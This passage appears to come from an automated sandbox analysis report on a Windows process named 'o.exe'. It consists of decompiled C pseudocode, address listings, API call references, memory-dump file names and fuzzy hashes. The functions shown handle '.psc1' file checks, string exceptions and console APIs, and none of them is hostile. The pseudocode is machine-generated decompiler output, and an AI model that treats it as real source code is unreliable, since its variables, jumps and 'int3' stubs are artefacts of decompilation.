                                                                                                                                                                                                                              0x0125c946
                                                                                                                                                                                                                              0x0125c950
                                                                                                                                                                                                                              0x0125ca4b
                                                                                                                                                                                                                              0x0125ca4b
                                                                                                                                                                                                                              0x0125ca4c
                                                                                                                                                                                                                              0x0125ca53
                                                                                                                                                                                                                              0x0125ca53
                                                                                                                                                                                                                              0x0125ca5b
                                                                                                                                                                                                                              0x0125ca60
                                                                                                                                                                                                                              0x0125ca66
                                                                                                                                                                                                                              0x0125ca6c
                                                                                                                                                                                                                              0x0125ca6c
                                                                                                                                                                                                                              0x0125ca6e
                                                                                                                                                                                                                              0x0125ca6e
                                                                                                                                                                                                                              0x0125ca70
                                                                                                                                                                                                                              0x0125ca78
                                                                                                                                                                                                                              0x0125ca78
                                                                                                                                                                                                                              0x0125c9e1
                                                                                                                                                                                                                              0x0125c9e4
                                                                                                                                                                                                                              0x0125c9e9
                                                                                                                                                                                                                              0x0125c9ed
                                                                                                                                                                                                                              0x0125c9f2
                                                                                                                                                                                                                              0x0125c9f7
                                                                                                                                                                                                                              0x0125c9fc
                                                                                                                                                                                                                              0x0125ca02
                                                                                                                                                                                                                              0x0125ca02
                                                                                                                                                                                                                              0x0125ca07
                                                                                                                                                                                                                              0x0125ca0f
                                                                                                                                                                                                                              0x0125ca1b
                                                                                                                                                                                                                              0x0125ca1b
                                                                                                                                                                                                                              0x0125c956
                                                                                                                                                                                                                              0x0125c95a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c960
                                                                                                                                                                                                                              0x0125c968
                                                                                                                                                                                                                              0x0125c96d
                                                                                                                                                                                                                              0x0125c971
                                                                                                                                                                                                                              0x0125c976
                                                                                                                                                                                                                              0x0125c97c
                                                                                                                                                                                                                              0x0125c97c
                                                                                                                                                                                                                              0x0125c978
                                                                                                                                                                                                                              0x0125c978
                                                                                                                                                                                                                              0x0125c978
                                                                                                                                                                                                                              0x0125c97e
                                                                                                                                                                                                                              0x0125c98c
                                                                                                                                                                                                                              0x0125c997
                                                                                                                                                                                                                              0x0125ca1e
                                                                                                                                                                                                                              0x0125ca1e
                                                                                                                                                                                                                              0x0125ca30
                                                                                                                                                                                                                              0x0125ca36
                                                                                                                                                                                                                              0x0125ca3c
                                                                                                                                                                                                                              0x0125ca3e
                                                                                                                                                                                                                              0x0125ca40
                                                                                                                                                                                                                              0x0125ca44
                                                                                                                                                                                                                              0x0125ca44
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c99d
                                                                                                                                                                                                                              0x0125c99d
                                                                                                                                                                                                                              0x0125c9a2
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c9a4
                                                                                                                                                                                                                              0x0125c9b4
                                                                                                                                                                                                                              0x0125c9be
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c9c6
                                                                                                                                                                                                                              0x0125c9ca
                                                                                                                                                                                                                              0x0125c9ce
                                                                                                                                                                                                                              0x0125c9ce
                                                                                                                                                                                                                              0x0125c9d5
                                                                                                                                                                                                                              0x0125c9d9
                                                                                                                                                                                                                              0x0125c9d9
                                                                                                                                                                                                                              0x0125c9de
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c9de
                                                                                                                                                                                                                              0x0125c997
                                                                                                                                                                                                                              0x0125c929

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125C8AB
                                                                                                                                                                                                                                • Part of subcall function 0125BAF5: __EH_prolog3.LIBCMT ref: 0125BAFC
                                                                                                                                                                                                                                • Part of subcall function 0125BAF5: _CxxThrowException.MSVCRT(00000000,0125F57C), ref: 0125BB4B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionH_prolog3H_prolog3_Throw
                                                                                                                                                                                                                              • String ID: /PSConsoleFile$ConsoleSchemaVersion
                                                                                                                                                                                                                              • API String ID: 406206064-2413366295
                                                                                                                                                                                                                              • Opcode ID: 3338a810907d9c41cc17219d43bacc42696567b8d68c7832eb12be207afa5d0d
                                                                                                                                                                                                                              • Instruction ID: 11b72afb84f07a6513fa7cb7429b94c69033436c50e8617162d06dfec7e21a21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3338a810907d9c41cc17219d43bacc42696567b8d68c7832eb12be207afa5d0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6951E5B0A10246DFDB94DF68D9D5BBDBBB9AF98300F148018DE05EB295EB70AD11CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125C11A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                                                                                              			E0125C11A(wchar_t* __ecx, void* __edx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				intOrPtr* _t8;
				short* _t13;
				int _t14;
				int _t16;
				void* _t17;
				void* _t25;
				wchar_t* _t27;
				void* _t28;
				void* _t29;
				signed int _t31;

				_t25 = __edx;
				_push(__ecx);
				_t5 =  *0x1260358; // 0xc21f7063
				_v8 = _t5 ^ _t31;
				_t27 = __ecx;
				if(E01259200(__ecx) != 0) {
					L4:
					_t8 =  *0x12606dc; // 0x3403de0
					_t16 = 0;
					 *0x1261204(0, 0x1a, _t27, _t29);
					 *((intOrPtr*)( *_t8 + 4))();
					_t29 = _t8;
				} else {
					_t13 = wcsrchr(_t27, 0x2e);
					if(_t13 == 0) {
						goto L4;
					} else {
						_t16 = 1;
						_t14 = CompareStringW(0x7f, 1, _t13, 0xffffffff, L".psc1", 5);
						if(_t14 == 0 || _t14 != 2) {
							goto L4;
						}
					}
				}
				_pop(_t28);
				_pop(_t17);
				return E01259A40(_t16, _t17, _v8 ^ _t31, _t25, _t28, _t29);
			}


















                                                                                                                                                                                                                              0x0125c11a
                                                                                                                                                                                                                              0x0125c11f
                                                                                                                                                                                                                              0x0125c120
                                                                                                                                                                                                                              0x0125c127
                                                                                                                                                                                                                              0x0125c12c
                                                                                                                                                                                                                              0x0125c136
                                                                                                                                                                                                                              0x0125c166
                                                                                                                                                                                                                              0x0125c166
                                                                                                                                                                                                                              0x0125c16b
                                                                                                                                                                                                                              0x0125c178
                                                                                                                                                                                                                              0x0125c17e
                                                                                                                                                                                                                              0x0125c184
                                                                                                                                                                                                                              0x0125c138
                                                                                                                                                                                                                              0x0125c13b
                                                                                                                                                                                                                              0x0125c145
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c147
                                                                                                                                                                                                                              0x0125c153
                                                                                                                                                                                                                              0x0125c157
                                                                                                                                                                                                                              0x0125c15f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c15f
                                                                                                                                                                                                                              0x0125c145
                                                                                                                                                                                                                              0x0125c18a
                                                                                                                                                                                                                              0x0125c18d
                                                                                                                                                                                                                              0x0125c196

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcsrchr.MSVCRT ref: 0125C13B
                                                                                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,.psc1,00000005), ref: 0125C157
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareStringwcsrchr
                                                                                                                                                                                                                              • String ID: .psc1
                                                                                                                                                                                                                              • API String ID: 732174003-2589272243
                                                                                                                                                                                                                              • Opcode ID: 9dcacf51e14d4611631e8dede4b6aeeb2381c29d71c7856f401e54fe692ab4ba
                                                                                                                                                                                                                              • Instruction ID: 0c0ed777db754b461d515ea4c2980b4ac6377f707bc2614a523bc4c578e229fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dcacf51e14d4611631e8dede4b6aeeb2381c29d71c7856f401e54fe692ab4ba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8801F5302503096FE7209F59AC89E7777ACDB86A64B004119F915D31D0EE70AC10C664
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125A512, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                                                                              			E0125A512() {
				intOrPtr* _t15;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;

				_push(0x48);
				E0125A5F0(E0125A7A3, _t17, _t20, _t21);
				E0125E172(_t17, _t22 - 0x2c, "invalid string position");
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_push(0);
				_t19 = _t22 - 0x54;
				E0125A353(_t19, _t22 - 0x2c);
				_push(0x125f540);
				_push(_t22 - 0x54);
				L01259E2C();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t15 = _t19 + 0x10;
				if( *((intOrPtr*)(_t19 + 0x24)) >= 0x10) {
					return  *_t15;
				}
				return _t15;
			}









                                                                                                                                                                                                                              0x0125a512
                                                                                                                                                                                                                              0x0125a519
                                                                                                                                                                                                                              0x0125a526
                                                                                                                                                                                                                              0x0125a52b
                                                                                                                                                                                                                              0x0125a532
                                                                                                                                                                                                                              0x0125a535
                                                                                                                                                                                                                              0x0125a538
                                                                                                                                                                                                                              0x0125a53d
                                                                                                                                                                                                                              0x0125a545
                                                                                                                                                                                                                              0x0125a546
                                                                                                                                                                                                                              0x0125a54b
                                                                                                                                                                                                                              0x0125a54c
                                                                                                                                                                                                                              0x0125a54d
                                                                                                                                                                                                                              0x0125a54e
                                                                                                                                                                                                                              0x0125a54f
                                                                                                                                                                                                                              0x0125a554
                                                                                                                                                                                                                              0x0125a557
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125a559
                                                                                                                                                                                                                              0x0125a55b

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125A519
                                                                                                                                                                                                                                • Part of subcall function 0125A353: std::runtime_error::runtime_error.LIBCPMT ref: 0125A362
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F540), ref: 0125A546
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • invalid string position, xrefs: 0125A51E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionH_prolog3_Throwstd::runtime_error::runtime_error
                                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                                              • API String ID: 1629767425-1799206989
                                                                                                                                                                                                                              • Opcode ID: 2ab658f4a9a224b8c90d8c90b4e98699977be2c9570a6dd6a45affef42b97cbc
                                                                                                                                                                                                                              • Instruction ID: 4714e3bbf3868a4f81fecacbba58dc9fccb15f835f2f6c0332d83168483c8c91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab658f4a9a224b8c90d8c90b4e98699977be2c9570a6dd6a45affef42b97cbc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AE0ED71970109ABDF84EB94D9C6FDC7378AB28708F608559D912AB040EB749A09C724
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125A4DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 41%
                                                                                                                                                                                                                              			E0125A4DA() {
				intOrPtr* _t27;
				void* _t29;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;

				_push(0x48);
				E0125A5F0(E0125A7A3, _t29, _t34, _t35);
				E0125E172(_t29, _t36 - 0x2c, "string too long");
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0125A293(_t36 - 0x54, _t36 - 0x2c);
				_push(0x125f504);
				_push(_t36 - 0x54);
				L01259E2C();
				asm("int3");
				_push(0x48);
				E0125A5F0(E0125A7A3, _t29, _t34, _t35);
				E0125E172(_t29, _t36 - 0x2c, "invalid string position");
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_push(0);
				_t33 = _t36 - 0x54;
				E0125A353(_t33, _t36 - 0x2c);
				_push(0x125f540);
				_push(_t36 - 0x54);
				L01259E2C();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t27 = _t33 + 0x10;
				if( *((intOrPtr*)(_t33 + 0x24)) >= 0x10) {
					return  *_t27;
				}
				return _t27;
			}









                                                                                                                                                                                                                              0x0125a4da
                                                                                                                                                                                                                              0x0125a4e1
                                                                                                                                                                                                                              0x0125a4ee
                                                                                                                                                                                                                              0x0125a4f3
                                                                                                                                                                                                                              0x0125a4fe
                                                                                                                                                                                                                              0x0125a503
                                                                                                                                                                                                                              0x0125a50b
                                                                                                                                                                                                                              0x0125a50c
                                                                                                                                                                                                                              0x0125a511
                                                                                                                                                                                                                              0x0125a512
                                                                                                                                                                                                                              0x0125a519
                                                                                                                                                                                                                              0x0125a526
                                                                                                                                                                                                                              0x0125a52b
                                                                                                                                                                                                                              0x0125a532
                                                                                                                                                                                                                              0x0125a535
                                                                                                                                                                                                                              0x0125a538
                                                                                                                                                                                                                              0x0125a53d
                                                                                                                                                                                                                              0x0125a545
                                                                                                                                                                                                                              0x0125a546
                                                                                                                                                                                                                              0x0125a54b
                                                                                                                                                                                                                              0x0125a54c
                                                                                                                                                                                                                              0x0125a54d
                                                                                                                                                                                                                              0x0125a54e
                                                                                                                                                                                                                              0x0125a54f
                                                                                                                                                                                                                              0x0125a554
                                                                                                                                                                                                                              0x0125a557
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125a559
                                                                                                                                                                                                                              0x0125a55b

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125A4E1
                                                                                                                                                                                                                                • Part of subcall function 0125A293: std::runtime_error::runtime_error.LIBCPMT ref: 0125A2A2
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F504), ref: 0125A50C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionH_prolog3_Throwstd::runtime_error::runtime_error
                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                              • API String ID: 1629767425-2556327735
                                                                                                                                                                                                                              • Opcode ID: 9c977657fdbd1a4c4d270aeadb8385d4f71aab12102559d47b5da348e375f92d
                                                                                                                                                                                                                              • Instruction ID: 9debbade18fac8529b99a0876de26e6d22ab70c40b679ec38a357d3faf1036bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c977657fdbd1a4c4d270aeadb8385d4f71aab12102559d47b5da348e375f92d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D01271D70109AACB85EAE0D9C2EECB33CAF24704F50C1199912B7440DF749B0CC721
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125EA2A, Relevance: 5.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 42%
                                                                                                                                                                                                                              			E0125EA2A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v20;
				char _v24;
				signed int _v44;
				char _v84;
				signed int _v104;
				char _v144;
				signed int _t18;
				signed int _t22;
				intOrPtr* _t26;
				char* _t30;
				char* _t31;
				intOrPtr _t32;
				signed int _t37;
				signed int _t38;
				void* _t41;
				signed int _t42;
				void* _t45;

				_t45 = __eflags;
				_t28 = _v20;
				E0125EC6D(_v20, 1, 0);
				_push(0);
				_push(0);
				L01259E2C();
				asm("int3");
				_t42 = _t41 - 0xc;
				E0125E1B0( &_v24, _t28);
				_push(0x125f5a8);
				_push( &_v24);
				L01259E2C();
				asm("int3");
				_push(_t41);
				_t37 = _t42;
				_t18 =  *0x1260358; // 0xc21f7063
				_v44 = _t18 ^ _t37;
				_t30 =  &_v84;
				E0125E200(_t30,  &_v24);
				_push(0x125f600);
				_push( &_v84);
				L01259E2C();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t37);
				_t38 = _t42 - 0x2c;
				_t22 =  *0x1260358; // 0xc21f7063
				_v104 = _t22 ^ _t38;
				_push(_t30);
				_t31 =  &_v144;
				E0125E260(__ebx, _t31, __edi, __esi, _t45);
				_push(0x125f5f0);
				_push( &_v144);
				L01259E2C();
				asm("int3");
				_push(_t38);
				_t26 = _t31 + 4;
				_t32 = _v144;
				 *((intOrPtr*)(_t31 + 0x14)) = _t32;
				if( *((intOrPtr*)(_t31 + 0x18)) >= 0x10) {
					_t26 =  *_t26;
				}
				 *((char*)(_t26 + _t32)) = 0;
				return _t26;
			}




















                                                                                                                                                                                                                              0x0125ea2a
                                                                                                                                                                                                                              0x0125ea2a
                                                                                                                                                                                                                              0x0125ea31
                                                                                                                                                                                                                              0x0125ea36
                                                                                                                                                                                                                              0x0125ea38
                                                                                                                                                                                                                              0x0125ea3a
                                                                                                                                                                                                                              0x0125ea3f
                                                                                                                                                                                                                              0x0125ea45
                                                                                                                                                                                                                              0x0125ea4c
                                                                                                                                                                                                                              0x0125ea51
                                                                                                                                                                                                                              0x0125ea59
                                                                                                                                                                                                                              0x0125ea5a
                                                                                                                                                                                                                              0x0125ea5f
                                                                                                                                                                                                                              0x0125ea62
                                                                                                                                                                                                                              0x0125ea63
                                                                                                                                                                                                                              0x0125ea68
                                                                                                                                                                                                                              0x0125ea6f
                                                                                                                                                                                                                              0x0125ea73
                                                                                                                                                                                                                              0x0125ea76
                                                                                                                                                                                                                              0x0125ea7b
                                                                                                                                                                                                                              0x0125ea83
                                                                                                                                                                                                                              0x0125ea84
                                                                                                                                                                                                                              0x0125ea89
                                                                                                                                                                                                                              0x0125ea8a
                                                                                                                                                                                                                              0x0125ea8b
                                                                                                                                                                                                                              0x0125ea8c
                                                                                                                                                                                                                              0x0125ea8d
                                                                                                                                                                                                                              0x0125ea8e
                                                                                                                                                                                                                              0x0125ea8f
                                                                                                                                                                                                                              0x0125ea92
                                                                                                                                                                                                                              0x0125ea93
                                                                                                                                                                                                                              0x0125ea98
                                                                                                                                                                                                                              0x0125ea9f
                                                                                                                                                                                                                              0x0125eaa2
                                                                                                                                                                                                                              0x0125eaa3
                                                                                                                                                                                                                              0x0125eaa6
                                                                                                                                                                                                                              0x0125eaab
                                                                                                                                                                                                                              0x0125eab3
                                                                                                                                                                                                                              0x0125eab4
                                                                                                                                                                                                                              0x0125eab9
                                                                                                                                                                                                                              0x0125eabc
                                                                                                                                                                                                                              0x0125eac3
                                                                                                                                                                                                                              0x0125eac6
                                                                                                                                                                                                                              0x0125eac9
                                                                                                                                                                                                                              0x0125eacc
                                                                                                                                                                                                                              0x0125eace
                                                                                                                                                                                                                              0x0125eace
                                                                                                                                                                                                                              0x0125ead0
                                                                                                                                                                                                                              0x0125ead5

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0125EC6D: free.MSVCRT(00000000,00000000,?,?,?,0125EA08,00000001,00000000,00000003,00000010,0125EB62,?,00000007,?,?), ref: 0125EC99
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0125EA3A
                                                                                                                                                                                                                                • Part of subcall function 0125E1B0: ??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 0125E1BF
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F5A8), ref: 0125EA5A
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F600), ref: 0125EA84
                                                                                                                                                                                                                                • Part of subcall function 0125E260: __EH_prolog3.LIBCMT ref: 0125E267
                                                                                                                                                                                                                                • Part of subcall function 0125E260: ??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 0125E275
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F5F0), ref: 0125EAB4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrow$??0exception@@V0@@$H_prolog3free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1064778723-0
                                                                                                                                                                                                                              • Opcode ID: 3a7bec15d3ce5513f358d42aae98becaef27de47a530b945b4284aa96d7fb65d
                                                                                                                                                                                                                              • Instruction ID: ea2a7e70dbae575eb428b551161da552664cb8fd34cde13476ca82e60691411d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a7bec15d3ce5513f358d42aae98becaef27de47a530b945b4284aa96d7fb65d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01B171D2020CBBCF44FFB9DC89EEEB37C9B18604F204425E92077484EDB0AA088665
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Analysis Process: o.exe PID: 1560 Parent PID: 6260 o.exeCOMMON

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00EBC7B8, Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentConsoleFontEx.KERNELBASE(?,?,?), ref: 00EBC96D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleCurrentFont
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2874077460-0
                                                                                                                                                                                                                              • Opcode ID: 9604b4f86f79f3ad04d2ea44fb2044ccedcc41d428c646235223ad08800abedf
                                                                                                                                                                                                                              • Instruction ID: 8c3efea0acaac283887df24313d53321f1dab309c8991083d702224959930022
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9604b4f86f79f3ad04d2ea44fb2044ccedcc41d428c646235223ad08800abedf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21616A71D043699FDB10DF64C840BDEBBB6AF89304F5181AAD508BB241DB705E89CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EB4AA4, Relevance: 1.6, APIs: 1, Instructions: 132threadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetThreadPreferredUILanguages.KERNELBASE(?,00000000,?), ref: 00EB4BDC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LanguagesPreferredThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 842807343-0
                                                                                                                                                                                                                              • Opcode ID: a67afc50069809041cae0ad8097eaf251301465c84c10dd9babcec2d03a3ecdb
                                                                                                                                                                                                                              • Instruction ID: dc30141e0be6163cea942675c88ad6af1ca41e61f482247b331843d420888295
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a67afc50069809041cae0ad8097eaf251301465c84c10dd9babcec2d03a3ecdb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 275123B0D002588FDB14CFA9C895BDEFBB1AF48314F15802AD819BB392D774A845CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EB4AB0, Relevance: 1.6, APIs: 1, Instructions: 126threadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetThreadPreferredUILanguages.KERNELBASE(?,00000000,?), ref: 00EB4BDC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LanguagesPreferredThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 842807343-0
                                                                                                                                                                                                                              • Opcode ID: a52db48b11f8af0d964b6aee572938a6816ccb83d7c8bfa636ea6384a809738a
                                                                                                                                                                                                                              • Instruction ID: f7a1fbd6f5bca0bb0873a89108cb6b56e546bdc17ee9646c95bd8e16bda5f0b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a52db48b11f8af0d964b6aee572938a6816ccb83d7c8bfa636ea6384a809738a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D5113B0D002188FDB14CFA9C895BDEFBB5AF48314F158029E919BB391D774A845CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00EBC608, Relevance: 1.6, APIs: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00EBC732
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.415366136.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: aae3a2eb8b22fbab93e02d512ac28971f47543f6a401cd99027d78102474cc7c
                                                                                                                                                                                                                              • Instruction ID: 81e40d7836f150ad5077120a7e0d6681bca5822fc7409a046e7edc7905f8ed66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aae3a2eb8b22fbab93e02d512ac28971f47543f6a401cd99027d78102474cc7c
